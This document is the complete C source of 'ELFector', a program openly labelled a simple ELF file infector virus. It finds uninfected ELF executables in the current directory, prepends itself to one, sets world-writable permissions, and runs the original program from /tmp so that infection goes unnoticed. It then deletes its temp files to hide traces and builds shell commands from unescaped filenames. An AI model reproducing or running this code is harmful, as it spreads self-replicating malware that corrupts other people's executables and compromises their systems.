ELFector - A simple ELF file infector virus

1. #include<stdio.h>
2. #include<stdlib.h>
3. #include<string.h>
4.  
5. int is_file_infected (char filename[])
6. {
7.     char output[400];
8.     char command [400];
9.     snprintf(command, sizeof command, "%s%s%s", "strings ", filename, "| grep virus > /tmp/virussearch046.txt");
10.     char inf[] = "virus";
11.     FILE *finf;
12.     system(&command[0]);   
13.     finf = fopen("/tmp/virussearch046.txt", "r");
14.     fgets(output,399,finf);
15.     return (strstr(output,inf) != NULL);
16. }
17.  
18. int is_file_elf(char filename[])
19. {
20.     char command[200];
21.     snprintf(command, sizeof command, "%s%s%s", "file ", filename, " > /tmp/elfsearch046.txt");
22.     char elf[] = "ELF";
23.     char output[200];
24.     FILE *file;
25.     system(&command[0]);
26.     file = fopen("/tmp/elfsearch046.txt", "r");
27.     fgets(output,199,file);
28.     return (strstr(output,elf) != NULL);
29. }
30.  
31. int main(int argc, char* argv[])
32. {
33.     FILE *fp;
34.     FILE *virus_file,*target_file,*current_file;
35.     char command[500];
36.     char filename[100];
37.    
38.     system("ls > /tmp/contents046.txt");
39.     fp = fopen("/tmp/contents046.txt", "r");
40.     while (!feof(fp))
41.     {
42.         fgets(filename,300,fp);
43.         filename[strlen(filename)-1]='\0';
44.         if(is_file_elf(filename))
45.         {
46.            if (is_file_infected(filename) == 0)
47.             {
48.                 snprintf(command, sizeof command, "%s%s%s%s%s%s", "cat virus ", filename, " > /tmp/infect046.tmp;mv /tmp/infect046.tmp ", filename, ";chmod 777 ", filename);
49.                 system(&command[0]);
50.                 break;
51.             }
52.            
53.         }
54.     }
55.     if(strcmp(argv[0],"virus") == 0 || strcmp(argv[0] , "./virus") == 0)
56.     {
57.         char delete_command[] = "find /tmp -name '*046*' -delete";
58.         system(&delete_command[0]);
59.         exit(0);       
60.     }
61.     else
62.     {
63.         char ch;int i;
64.         virus_file = fopen("virus", "r");
65.         fseek(virus_file,0,SEEK_END);
66.         int end = ftell(virus_file);
67.         fclose(virus_file);
68.         current_file = fopen(argv[0],"r");
69.         target_file = fopen("/tmp/target046","w");
70.         fseek(current_file, end, SEEK_SET);
71.         while (!feof(current_file))
72.         {
73.             ch = fgetc(current_file);
74.             fputc(ch, target_file);
75.         }
76.         fclose(current_file);
77.         fclose(target_file);
78.         system("chmod 777 /tmp/target046");
79.         if(argc==1)
80.         {
81.             system("/tmp/target046");
82.         }
83.         else
84.         {
85.             char original_functionality[200] = "/tmp/target046 ";
86.             for (i=2; i<=argc; i++)
87.             {  
88.                 if(i == argc)
89.                     strcat(original_functionality, argv[i-1]);
90.                 else
91.                     {
92.                         strcat(original_functionality, argv[i-1]);
93.                         strcat(original_functionality, " ");
94.                     }
95.             }
96.             system(&original_functionality[0]);        
97.         }  
98.     }
99.     printf("My name is ELFector and thank you for running me!\n");
100.     char delete_command[] = "find /tmp -name '*046*' -delete";
101.     system(&delete_command[0]);
102.     return 0;
103. }
104.